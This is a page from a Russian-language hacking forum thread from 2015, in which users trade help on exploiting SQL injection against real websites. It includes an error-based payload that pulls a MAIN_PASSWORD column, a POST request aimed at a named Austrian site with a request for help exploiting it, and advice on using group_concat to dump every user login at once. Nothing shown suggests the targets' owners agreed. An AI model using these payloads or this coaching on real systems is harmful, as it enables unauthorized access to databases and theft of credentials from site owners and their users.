HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 2430 из 2438 « Первая < 14301930233023802420 2426 2427 2428 2429 2430 2431 2432 2433 2434 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #24291  
Старый 31.03.2015, 14:13
Br@!ns
Guest
Сообщений: n/a
Провел на форуме:
179197

Репутация: 25
По умолчанию
При эксплуатации sql инжекта возникла проблема. всего 2 таблицы основная и Information.schema. Узнаю без проблем имена таблиц с помощью select table_name from information_schema.tables. когда пытаюсь вытащить данные с таблиц получается вот это:



В чем может быть причина?

мб из-за того что имя таблицы преобразовываются в верхний регистр? но тогда почему вытянулись данные с information_schema опять же.

PS при запросе select blabla from ws_lifefitness_live_us.admin_user_owners пишет SELECT command denied to user 'user'@'localhost' for table 'ADMIN_USER_OWNERS'
 
Ответить с цитированием

  #24292  
Старый 31.03.2015, 14:25
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033

Репутация: 8
По умолчанию
Цитата:
Сообщение от Br@!ns  
Br@!ns said:
При эксплуатации sql инжекта возникла проблема. всего 2 таблицы основная и Information.schema. Узнаю без проблем имена таблиц с помощью select table_name from information_schema.tables. когда пытаюсь вытащить данные с таблиц получается вот это:

В чем может быть причина?
мб из-за того что имя таблицы преобразовываются в верхний регистр? но тогда почему вытянулись данные с information_schema опять же.
PS при запросе select blabla from ws_lifefitness_live_us.admin_user_owners пишет SELECT command denied to user 'user'@'localhost' for table 'ADMIN_USER_OWNERS'
Во-первых, blabla - строковая константа, а потому должна обрамляться кавычками с двух сторон для корректности запроса.

Если blabla - реально существуюший стобец, тогда не надо. Но я подозреваю, что он не существует.

Во-вторых, я полагаю что в твоей схеме не существует такой таблицы. При вытаскивании данных желательно использовать полный адрес для таблицы типа "information_schema.tables". примеры - my_database.my_table , `my_database`.my_table , `my_database`.`my_table`
 
Ответить с цитированием

  #24293  
Старый 31.03.2015, 14:33
Br@!ns
Guest
Сообщений: n/a
Провел на форуме:
179197

Репутация: 25
По умолчанию
Цитата:
Сообщение от BigBear  
BigBear said:
Во-вторых, я полагаю что в твоей схеме не существует такой таблицы. При вытаскивании данных желательно использовать полный адрес для таблицы типа "information_schema.tables". примеры - my_database.my_table , `my_database`.my_table , `my_database`.`my_table`
нашел выход в нахождении другой sql, вопрос решен.
 
Ответить с цитированием

  #24294  
Старый 03.04.2015, 13:54
sysjuk
Guest
Сообщений: n/a
Провел на форуме:
69527

Репутация: 5
По умолчанию
'+and+(SeLeCt+1+FrOm(SeLeCt+count(*),CoNcAt((SeLeC t(SeLeCt(SeLeCt+CoNcAt(char(33,126,33),MAIN_PASSWO RD,char(33,126,33))+FrOm+currency+LiMiT+15,1))+FrO m+information_schema.TaBlEs+LiMiT+0,1),floor(rand( 0)*2))x+FrOm+information_schema.TaBlEs+GrOuP+By+x) a)+and+'1'='1

выводит: Subquery returns more than 1 row

как правильно составить)?
 
Ответить с цитированием

  #24295  
Старый 03.04.2015, 14:00
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию
свой вывод помести в group_concat(). и пользуйся поиском, пару страниц назад такой вопрос уже был
 
Ответить с цитированием

  #24296  
Старый 03.04.2015, 16:33
DezMond™
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428

Репутация: 662
Отправить сообщение для DezMond™ с помощью ICQ
По умолчанию
http://www.menschenrechte.ac.at/db/suche/bib_erg.php

post запрос

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]schlag1[/COLOR][COLOR="#007700"]=--+[/COLOR][COLOR="#0000BB"]Bitte[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]ausw[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]E4hlen[/COLOR][COLOR="#007700"]+--&[/COLOR][COLOR="#0000BB"]op1[/COLOR][COLOR="#007700"]=AND&[/COLOR][COLOR="#0000BB"]schlagtext2[/COLOR][COLOR="#007700"]=&[/COLOR][COLOR="#0000BB"]schlag2[/COLOR][COLOR="#007700"]=--+[/COLOR][COLOR="#0000BB"]Bitte[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]ausw[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]E4hlen[/COLOR][COLOR="#007700"]+--&[/COLOR][COLOR="#0000BB"]op2[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]ANDschlag3[/COLOR][COLOR="#007700"]=--+[/COLOR][COLOR="#0000BB"]Bitte[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]ausw[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]E4hlen[/COLOR][COLOR="#007700"]+--&[/COLOR][COLOR="#0000BB"]bib_suche[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]Suche[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]starten[/COLOR][COLOR="#007700"]&[/COLOR][COLOR="#0000BB"]autor[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]aaa[/COLOR][COLOR="#DD0000"]'[/COLOR][/COLOR] 
Помогите раскрутить...
 
Ответить с цитированием

  #24297  
Старый 03.04.2015, 18:31
sysjuk
Guest
Сообщений: n/a
Провел на форуме:
69527

Репутация: 5
По умолчанию
Цитата:
Сообщение от faza02  
faza02 said:

свой вывод помести в group_concat(). и пользуйся поиском, пару страниц назад такой вопрос уже был
Все мануалы прокурил не могу составить, завис к тому же на ошибке: Operand should contain 1 column(s).

Можешь все же помочь с составлением правильного запроса?!

Все решил задачу эту, спасибо.
 
Ответить с цитированием

  #24298  
Старый 05.04.2015, 18:06
teh
Guest
Сообщений: n/a
Провел на форуме:
26437

Репутация: -2
По умолчанию
Здраствуйте! Хочу спросить, есть ли возможность обойти limit в скулях, что б вывелось все сразу.

Например даю запрос

union select 1,2,login from users limit 1,1

Выводить одну запись, можно зделать запрос что б вывело несколько?
 
Ответить с цитированием

  #24299  
Старый 05.04.2015, 19:31
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию
Цитата:
Сообщение от teh  
teh said:

Здраствуйте! Хочу спросить, есть ли возможность обойти limit в скулях, что б вывелось все сразу.
Например даю запрос
union select 1,2,login from users limit 1,1
Выводить одну запись, можно зделать запрос что б вывело несколько?
group_concat(login)
 
Ответить с цитированием

  #24300  
Старый 05.04.2015, 21:00
teh
Guest
Сообщений: n/a
Провел на форуме:
26437

Репутация: -2
По умолчанию
Цитата:
Сообщение от faza02  
faza02 said:

group_concat(login)
спасибо!
 
Ответить с цитированием
Ответ
Страница 2430 из 2438 « Первая < 14301930233023802420 2426 2427 2428 2429 2430 2431 2432 2433 2434 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ